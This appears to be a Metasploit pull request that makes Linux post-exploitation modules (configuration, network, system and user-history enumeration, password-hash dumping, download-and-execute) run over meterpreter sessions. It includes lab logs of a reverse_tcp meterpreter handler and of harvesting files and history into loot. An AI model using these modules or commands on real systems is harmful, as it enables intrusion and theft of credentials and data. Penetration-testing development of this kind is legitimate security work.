### PR TITLE
Make some linux enum post modules work on meterpreter

### DIFF
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -104,12 +104,15 @@ module Msf::Post::Common
       end
 
       session.response_timeout = time_out
+      p "[*] executing #{cmd}"
       process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true})
       o = ""
       while (d = process.channel.read)
+        p "[*] reading channel #{d}"
         break if d == ""
         o << d
       end
+      o.chomp! if o
       process.channel.close
       process.close
     when /shell/

--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -104,11 +104,9 @@ module Msf::Post::Common
       end
 
       session.response_timeout = time_out
-      p "[*] executing #{cmd}"
       process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true})
       o = ""
       while (d = process.channel.read)
-        p "[*] reading channel #{d}"
         break if d == ""
         o << d
       end

--- a/modules/post/linux/gather/enum_configs.rb
+++ b/modules/post/linux/gather/enum_configs.rb
@@ -23,8 +23,8 @@ class Metasploit3 < Msf::Post
         [
           'ohdae <bindshell[at]live.com>',
         ],
-      'Platform'      => [ 'linux' ],
-      'SessionTypes'  => [ 'shell' ]
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
     ))
   end
 
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post
 
     configs.each do |f|
       output = read_file("#{f}")
-      save(f,  output) if output !~ /No such file or directory/
+      save(f,  output) if output && output !~ /No such file or directory/
     end
   end
 end

--- a/modules/post/linux/gather/enum_network.rb
+++ b/modules/post/linux/gather/enum_network.rb
@@ -26,8 +26,8 @@ class Metasploit3 < Msf::Post
             'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing
             'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux
           ],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
+        'Platform'      => ['linux'],
+        'SessionTypes'  => ['shell', 'meterpreter']
       ))
   end
 

--- a/modules/post/linux/gather/enum_protections.rb
+++ b/modules/post/linux/gather/enum_protections.rb
@@ -28,8 +28,8 @@ class Metasploit3 < Msf::Post
         [
           'ohdae <bindshell[at]live.com>'
         ],
-      'Platform'      => [ 'linux' ],
-      'SessionTypes'  => [ 'shell' ]
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell']
     ))
   end
 
@@ -58,7 +58,11 @@ class Metasploit3 < Msf::Post
   end
 
   def which(env_paths, cmd)
+    print_status("#{env_paths}")
+    print_status("#{cmd}")
     for path in env_paths
+      output = cmd_exec("/bin/ls #{path} | /bin/grep '#{cmd}'")
+      print_status(output)
       if "#{cmd}" == cmd_exec("/bin/ls #{path} | /bin/grep '#{cmd}'")
         return "#{path}/#{cmd}"
       end
@@ -73,6 +77,12 @@ class Metasploit3 < Msf::Post
       "rkhunter", "tcpdump", "webmin", "jailkit", "pwgen", "proxychains", "bastille",
       "psad", "wireshark", "nagios", "nagios", "apparmor", "honeyd", "thpot"
     ]
+
+    #output = cmd_exec("echo $PATH")
+    #print_status("#{Rex::Text.to_hex_dump(output)}")
+    #print_status("#{Rex::Text.to_hex_dump(output.chomp)}")
+
+    #return
 
     env_paths = cmd_exec("echo $PATH").split(":")
 

--- a/modules/post/linux/gather/enum_protections.rb
+++ b/modules/post/linux/gather/enum_protections.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post
           'ohdae <bindshell[at]live.com>'
         ],
       'Platform'      => ['linux'],
-      'SessionTypes'  => ['shell']
+      'SessionTypes'  => ['shell', 'meterpreter']
     ))
   end
 

--- a/modules/post/linux/gather/enum_protections.rb
+++ b/modules/post/linux/gather/enum_protections.rb
@@ -58,11 +58,7 @@ class Metasploit3 < Msf::Post
   end
 
   def which(env_paths, cmd)
-    print_status("#{env_paths}")
-    print_status("#{cmd}")
     for path in env_paths
-      output = cmd_exec("/bin/ls #{path} | /bin/grep '#{cmd}'")
-      print_status(output)
       if "#{cmd}" == cmd_exec("/bin/ls #{path} | /bin/grep '#{cmd}'")
         return "#{path}/#{cmd}"
       end
@@ -77,12 +73,6 @@ class Metasploit3 < Msf::Post
       "rkhunter", "tcpdump", "webmin", "jailkit", "pwgen", "proxychains", "bastille",
       "psad", "wireshark", "nagios", "nagios", "apparmor", "honeyd", "thpot"
     ]
-
-    #output = cmd_exec("echo $PATH")
-    #print_status("#{Rex::Text.to_hex_dump(output)}")
-    #print_status("#{Rex::Text.to_hex_dump(output.chomp)}")
-
-    #return
 
     env_paths = cmd_exec("echo $PATH").split(":")
 

--- a/modules/post/linux/gather/enum_system.rb
+++ b/modules/post/linux/gather/enum_system.rb
@@ -29,8 +29,8 @@ class Metasploit3 < Msf::Post
             'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing
             'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid
           ],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
+        'Platform'      => ['linux'],
+        'SessionTypes'  => ['shell', 'meterpreter']
       ))
 
   end

--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -49,8 +49,8 @@ class Metasploit3 < Msf::Post
     last = execute("/usr/bin/last && /usr/bin/lastlog")
     sudoers = cat_file("/etc/sudoers")
 
-    save("Last logs", last)
-    save("Sudoers", sudoers) unless sudoers =~ /Permission denied/
+    save("Last logs", last) unless last.nil?
+    save("Sudoers", sudoers) unless sudoers.nil? || sudoers =~ /Permission denied/
   end
 
   def save(msg, data, ctype="text/plain")
@@ -96,13 +96,13 @@ class Metasploit3 < Msf::Post
           hist = cat_file("/home/#{u}/.bash_history")
         end
 
-        save("History for #{u}", hist) unless hist =~ /No such file or directory/
+        save("History for #{u}", hist) unless hist.nil? || hist =~ /No such file or directory/
       end
     else
       vprint_status("Extracting history for #{user}")
       hist = cat_file("/home/#{user}/.bash_history")
       vprint_status(hist)
-      save("History for #{user}", hist) unless hist =~ /No such file or directory/
+      save("History for #{user}", hist) unless hist.nil? || hist =~ /No such file or directory/
     end
   end
 
@@ -118,13 +118,13 @@ class Metasploit3 < Msf::Post
           sql_hist = cat_file("/home/#{u}/.mysql_history")
         end
 
-        save("History for #{u}", sql_hist) unless sql_hist =~ /No such file or directory/
+        save("History for #{u}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
       end
     else
       vprint_status("Extracting SQL history for #{user}")
       sql_hist = cat_file("/home/#{user}/.mysql_history")
       vprint_status(sql_hist) if sql_hist
-      save("SQL History for #{user}", sql_hist) unless sql_hist && sql_hist =~ /No such file or directory/
+      save("SQL History for #{user}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
     end
   end
 
@@ -140,13 +140,13 @@ class Metasploit3 < Msf::Post
           vim_hist = cat_file("/home/#{u}/.viminfo")
         end
 
-        save("VIM History for #{u}", vim_hist) unless vim_hist =~ /No such file or directory/
+        save("VIM History for #{u}", vim_hist) unless vim_hist.nil? || vim_hist =~ /No such file or directory/
       end
     else
       vprint_status("Extracting history for #{user}")
       vim_hist = cat_file("/home/#{user}/.viminfo")
       vprint_status(vim_hist)
-      save("VIM History for #{user}", vim_hist) unless vim_hist =~ /No such file or directory/
+      save("VIM History for #{user}", vim_hist) unless vim_hist.nil? || vim_hist =~ /No such file or directory/
     end
   end
 end

--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -26,8 +26,8 @@ class Metasploit3 < Msf::Post
             # based largely on get_bash_history function by Stephen Haywood
             'ohdae <bindshell[at]live.com>'
           ],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
+        'Platform'      => ['linux'],
+        'SessionTypes'  => ['shell', 'meterpreter']
       ))
 
   end
@@ -123,14 +123,14 @@ class Metasploit3 < Msf::Post
     else
       vprint_status("Extracting SQL history for #{user}")
       sql_hist = cat_file("/home/#{user}/.mysql_history")
-      vprint_status(sql_hist)
-      save("SQL History for #{user}", sql_hist) unless sql_hist =~ /No such file or directory/
+      vprint_status(sql_hist) if sql_hist
+      save("SQL History for #{user}", sql_hist) unless sql_hist && sql_hist =~ /No such file or directory/
     end
   end
 
   def get_vim_history(users, user)
     if user == "root" and users != nil
-      users = users.chomp.split()
+      users = users.chomp.split
       users.each do |u|
         if u == "root"
           vprint_status("Extracting VIM history for #{u}")

--- a/modules/post/linux/gather/enum_xchat.rb
+++ b/modules/post/linux/gather/enum_xchat.rb
@@ -20,11 +20,11 @@ class Metasploit3 < Msf::Post
         .log files.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'sinn3r'],
-      'Platform'      => [ 'linux' ],
+      'Author'        => ['sinn3r'],
+      'Platform'      => ['linux'],
       # linux meterpreter is too busted to support right now,
       # will come back and add support once it's more usable.
-      'SessionTypes'  => [ 'shell' ],
+      'SessionTypes'  => ['shell', 'meterpreter'],
       'Actions'       =>
         [
           ['CONFIGS', { 'Description' => 'Collect XCHAT\'s config files' } ],
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post
   end
 
   def whoami
-    user = cmd_exec("whoami").chomp
+    user = cmd_exec("/usr/bin/whoami").chomp
     return user
   end
 
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Post
     files.each do |f|
       vprint_status("#{@peer} - Downloading: #{base + f}")
       buf = read_file(base + f)
-      next if buf.empty?
+      next if buf.blank?
       config << {
         :filename => f,
         :data     => buf
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
     @peer = "#{session.session_host}:#{session.session_port}"
 
     user = whoami
-    if user.nil?
+    if user.blank?
       print_error("#{@peer} - Unable to get username, abort.")
       return
     end
@@ -149,8 +149,8 @@ class Metasploit3 < Msf::Post
     configs  = get_configs(base)  if action.name =~ /ALL|CONFIGS/i
     chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i
 
-    save(:configs, configs)   if not configs.empty?
-    save(:chatlogs, chatlogs) if not chatlogs.empty?
+    save(:configs, configs)   unless configs.empty?
+    save(:chatlogs, chatlogs) unless chatlogs.empty?
   end
 
 end

--- a/modules/post/linux/gather/hashdump.rb
+++ b/modules/post/linux/gather/hashdump.rb
@@ -16,11 +16,10 @@ class Metasploit3 < Msf::Post
         'Name'          => 'Linux Gather Dump Password Hashes for Linux Systems',
         'Description'   => %q{ Post Module to dump the password hashes for all users on a Linux System},
         'License'       => MSF_LICENSE,
-        'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
+        'Author'        => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
+        'Platform'      => ['linux'],
+        'SessionTypes'  => ['shell', 'meterpreter']
       ))
-
   end
 
   # Run Method for when run command is issued
@@ -43,11 +42,9 @@ class Metasploit3 < Msf::Post
       # Save pwd file
       upassf = store_loot("linux.hashes", "text/plain", session, john_file, "unshadowed_passwd.pwd", "Linux Unshadowed Password File")
       print_good("Unshadowed Password File: #{upassf}")
-
     else
       print_error("You must run this module as root!")
     end
-
   end
 
   def unshadow(pf,sf)
@@ -63,6 +60,8 @@ class Metasploit3 < Msf::Post
         end
       end
     end
-    return unshadowed
+
+    unshadowed
   end
+
 end

--- a/modules/post/linux/gather/mount_cifs_creds.rb
+++ b/modules/post/linux/gather/mount_cifs_creds.rb
@@ -11,16 +11,16 @@ class Metasploit3 < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        'Name'          => 'Linux Gather Saved mount.cifs/mount.smbfs Credentials',
-        'Description'   => %q{
-          Post Module to obtain credentials saved for mount.cifs/mount.smbfs in
-          /etc/fstab on a Linux system.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Jon Hart <jhart[at]spoofed.org>'],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
-      ))
+      'Name'          => 'Linux Gather Saved mount.cifs/mount.smbfs Credentials',
+      'Description'   => %q{
+        Post Module to obtain credentials saved for mount.cifs/mount.smbfs in
+        /etc/fstab on a Linux system.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['Jon Hart <jhart[at]spoofed.org>'],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
+    ))
   end
 
   def run

--- a/modules/post/linux/manage/download_exec.rb
+++ b/modules/post/linux/manage/download_exec.rb
@@ -15,24 +15,23 @@ class Metasploit3 < Msf::Post
     super( update_info( info,
       'Name'          => 'Linux Manage Download and Execute',
       'Description'   => %q{
-          This module downloads and runs a file with bash. It first tries to uses curl as
-        its HTTP client and then wget if it's not found. Bash found in the PATH is used to
-        execute the file.
+        This module downloads and runs a file with bash. It first tries to uses curl as
+        its HTTP client and then wget if it's not found. Bash found in the PATH is used
+        to execute the file.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
           'Joshua D. Abraham <jabra[at]praetorian.com>',
         ],
-      'Platform'      => [ 'linux' ],
-      'SessionTypes'  => [ 'shell' ]
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
     ))
 
     register_options(
       [
         OptString.new('URL', [true, 'Full URL of file to download.'])
       ], self.class)
-
   end
 
   def cmd_exec_vprint(cmd)


### PR DESCRIPTION
## Requeriments
- [x] https://github.com/rapid7/meterpreter/pull/89
- [x] https://github.com/rapid7/meterpreter/pull/90
## Verification
- [x] Have linux meterpreter binaries with https://github.com/rapid7/meterpreter/pull/89 and https://github.com/rapid7/meterpreter/pull/90 changes
- [x] Get a linux meterpreter session, you can use `exploit/multi/handler`

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1155072 bytes) to 172.16.158.188
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.188:57629) at 2014-07-08 16:32:25 -0500

meterpreter >
meterpreter > background
[*] Backgrounding session 1...

```
- [x] Verify which the modified post modules work on a meterpreter session. I include my test on an old Ubuntu 10.04 virtual machine:

```
msf exploit(handler) > use post/linux/gather/enum_configs
msf post(enum_configs) > set session 1
session => 1
msf post(enum_configs) > set VERBOSE true
VERBOSE => true
msf post(enum_configs) > run

[*] Running module against ubuntu
[*] Info:
[*]     Ubuntu 10.04.4 LTS
[*]     Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686 GNU/Linux
[*] Finding configuration files...
[*] apache2.conf stored in /Users/jvazquez/.msf4/loot/20140708163307_default_172.16.158.188_linux.enum.conf_742740.txt
[*] ports.conf stored in /Users/jvazquez/.msf4/loot/20140708163308_default_172.16.158.188_linux.enum.conf_456407.txt
[-] Failed to open file: /etc/nginx/nginx.conf
[-] Failed to open file: /etc/snort/snort.conf
[*] my.cnf stored in /Users/jvazquez/.msf4/loot/20140708163308_default_172.16.158.188_linux.enum.conf_481005.txt
[*] ufw.conf stored in /Users/jvazquez/.msf4/loot/20140708163308_default_172.16.158.188_linux.enum.conf_683052.txt
[*] sysctl.conf stored in /Users/jvazquez/.msf4/loot/20140708163309_default_172.16.158.188_linux.enum.conf_179143.txt
[-] Failed to open file: /etc/security.access.conf
[*] shells stored in /Users/jvazquez/.msf4/loot/20140708163309_default_172.16.158.188_linux.enum.conf_064392.txt
[*] sepermit.conf stored in /Users/jvazquez/.msf4/loot/20140708163309_default_172.16.158.188_linux.enum.conf_514472.txt
[*] ca-certificates.conf stored in /Users/jvazquez/.msf4/loot/20140708163310_default_172.16.158.188_linux.enum.conf_967687.txt
[*] access.conf stored in /Users/jvazquez/.msf4/loot/20140708163310_default_172.16.158.188_linux.enum.conf_289097.txt
[-] Failed to open file: /etc/gated.conf
[*] rpc stored in /Users/jvazquez/.msf4/loot/20140708163311_default_172.16.158.188_linux.enum.conf_325156.txt
[-] Failed to open file: /etc/psad/psad.conf
[-] Failed to open file: /etc/mysql/debian.cnf
[-] Failed to open file: /etc/chkrootkit.conf
[*] logrotate.conf stored in /Users/jvazquez/.msf4/loot/20140708163311_default_172.16.158.188_linux.enum.conf_770595.txt
[-] Failed to open file: /etc/rkhunter.conf
[*] smb.conf stored in /Users/jvazquez/.msf4/loot/20140708163312_default_172.16.158.188_linux.enum.conf_375855.txt
[*] ldap.conf stored in /Users/jvazquez/.msf4/loot/20140708163312_default_172.16.158.188_linux.enum.conf_752827.txt
[-] Failed to open file: /etc/openldap/openldap.conf
[-] Failed to open file: /etc/cups/cups.conf
[-] Failed to open file: /etc/opt/lampp/etc/httpd.conf
[*] sysctl.conf stored in /Users/jvazquez/.msf4/loot/20140708163313_default_172.16.158.188_linux.enum.conf_600683.txt
[-] Failed to open file: /etc/proxychains.conf
[*] snmp.conf stored in /Users/jvazquez/.msf4/loot/20140708163313_default_172.16.158.188_linux.enum.conf_741159.txt
[-] Failed to open file: /etc/mail/sendmail.conf
[-] Failed to open file: /etc/snmp/snmp.conf
[*] Post module execution completed
msf post(enum_configs) > cat /Users/jvazquez/.msf4/loot/20140708163313_default_172.16.158.188_linux.enum.conf_741159.txt
[*] exec: cat /Users/jvazquez/.msf4/loot/20140708163313_default_172.16.158.188_linux.enum.conf_741159.txt

#
# "$Id$"
#
#   Sample SNMP configuration file for CUPS.  See "man cups-smnp.conf" for a
#   complete description of this file.
#

Address @LOCAL
Community public

#
# End of "$Id$".
#

msf post(enum_configs) > use post/linux/gather/enum_network
msf post(enum_network) > set VERBOSE true
VERBOSE => true
msf post(enum_network) > set SESSION 1
SESSION => 1
msf post(enum_network) > run

[*] Running module against ubuntu
[*] Execute: /usr/bin/whoami
[*] Module running as juan
[+] Info:
[+]     Ubuntu 10.04.4 LTS
[+]     Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686 GNU/Linux
[*] Collecting data...
[*] Execute: /sbin/ifconfig -a
[*] Execute: /sbin/route -e
[*] Execute: /sbin/iptables -L
[*] Execute: /sbin/iptables -L -t nat
[*] Execute: /sbin/iptables -L -t mangle
[*] Download: /etc/resolv.conf
[*] Download: /etc/ssh/sshd_config
[*] Download: /etc/hosts
[*] Execute: /usr/bin/lsof -nPi
[*] Execute: /sbin/iwconfig
[*] Execute: /bin/netstat -tulpn
[*] Execute: ls -R /etc/network
[*] Execute: /usr/bin/find / -maxdepth 3 -name .ssh
[*] Network config stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_079997.txt
[*] Route table stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_053403.txt
[*] Firewall config stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_560494.txt
[*] DNS config stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_161278.txt
[*] SSHD config stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_380526.txt
[*] Host file stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_361863.txt
[*] Active connections stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_463542.txt
[*] Wireless information stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_536692.txt
[*] Listening ports stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_369787.txt
[*] If-Up/If-Down stored in /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_402344.txt
[*] Post module execution completed
msf post(enum_network) > cat /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_053403.txt
[*] exec: cat /Users/jvazquez/.msf4/loot/20140708163406_default_172.16.158.188_linux.enum.netwo_053403.txt

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
172.16.158.0    *               255.255.255.0   U         0 0          0 eth2
link-local      *               255.255.0.0     U         0 0          0 eth2
default         172.16.158.2    0.0.0.0         UG        0 0          0 eth2msf post(enum_network) >

msf post(enum_protections) > set VERBOSE true
VERBOSE => true
msf post(enum_protections) > set SESSION 1
SESSION => 1
msf post(enum_protections) > run

[*] Running module against ubuntu
[*] Info:
[*]     Ubuntu 10.04.4 LTS
[*]     Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686 GNU/Linux
[*] Finding installed applications...
[+] ufw found: /usr/sbin/ufw
[+] logrotate found: /usr/sbin/logrotate
[+] tcpdump found: /usr/sbin/tcpdump
[*] Installed applications saved to notes.
[*] Post module execution completed
msf post(enum_protections) > notes
[*] Time: 2014-07-08 21:39:35 UTC Note: type=linux.protection data="/usr/sbin/ufw"
[*] Time: 2014-07-08 21:39:37 UTC Note: type=linux.protection data="/usr/sbin/logrotate"
[*] Time: 2014-07-08 21:39:50 UTC Note: type=linux.protection data="/usr/sbin/tcpdump"

msf post(enum_protections) > use post/linux/gather/enum_system
msf post(enum_system) > set session 1
session => 1
msf post(enum_system) > set verbose true
verbose => true
msf post(enum_system) > run

[+] Info:
[+]     Ubuntu 10.04.4 LTS
[+]     Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686 GNU/Linux
[*] Execute: /bin/cat /etc/passwd | cut -d : -f 1
[*] Execute: /usr/bin/whoami
[*] Execute: dpkg -l
[*] Execute: /usr/bin/service --status-all
[*] Execute: /bin/mount -l
[*] Enumerating as juan
[*] Execute: crontab -l
[*] Execute: /bin/df -ahT
[*] Execute: find /var/log -type f -perm -4 2> /dev/null
[*] Execute: find / -xdev -type f -perm +6000 -perm -1 2> /dev/null
[*] Linux version stored in /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_731604.txt
[*] User accounts stored in /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_040275.txt
[*] Installed Packages stored in /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_952051.txt
[*] Running Services stored in /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_675495.txt
[*] Cron jobs stored in /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_448057.txt
[*] Disk info stored in /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_438688.txt
[*] Logfiles stored in /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_346187.txt
[*] Setuid/setgid files stored in /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_942727.txt
[*] Post module execution completed
msf post(enum_system) > cat /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_040275.txt
[*] exec: cat /Users/jvazquez/.msf4/loot/20140708164202_test_172.16.158.188_linux.enum.syste_040275.txt

root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
libuuid
syslog
messagebus
avahi-autoipd
avahi
couchdb
speech-dispatcher
usbmux
haldaemon
kernoops
pulse
rtkit
saned
hplip
gdm
juan
mysql

msf post(enum_users_history) > set VERBOSE false
VERBOSE => false
msf post(enum_users_history) > set SESSION 1
SESSION => 1
msf post(enum_users_history) > run

[+] Info:
[+]     Ubuntu 10.04.4 LTS
[+]     Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686 GNU/Linux
[*] History for juan stored in /Users/jvazquez/.msf4/loot/20140708164838_test_172.16.158.188_linux.enum.users_461600.txt
[-] Failed to open file: /home/juan/.mysql_history
[*] VIM History for juan stored in /Users/jvazquez/.msf4/loot/20140708164838_test_172.16.158.188_linux.enum.users_880212.txt
[-] Failed to open file: /etc/sudoers
[*] Last logs stored in /Users/jvazquez/.msf4/loot/20140708164838_test_172.16.158.188_linux.enum.users_202715.txt
[*] Post module execution completed
msf post(enum_users_history) > cat /Users/jvazquez/.msf4/loot/20140708164838_test_172.16.158.188_linux.enum.users_880212.txt
[*] exec: cat /Users/jvazquez/.msf4/loot/20140708164838_test_172.16.158.188_linux.enum.users_880212.txt

# This viminfo file was generated by Vim 7.2.
# You may edit it if you're careful!

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):


```
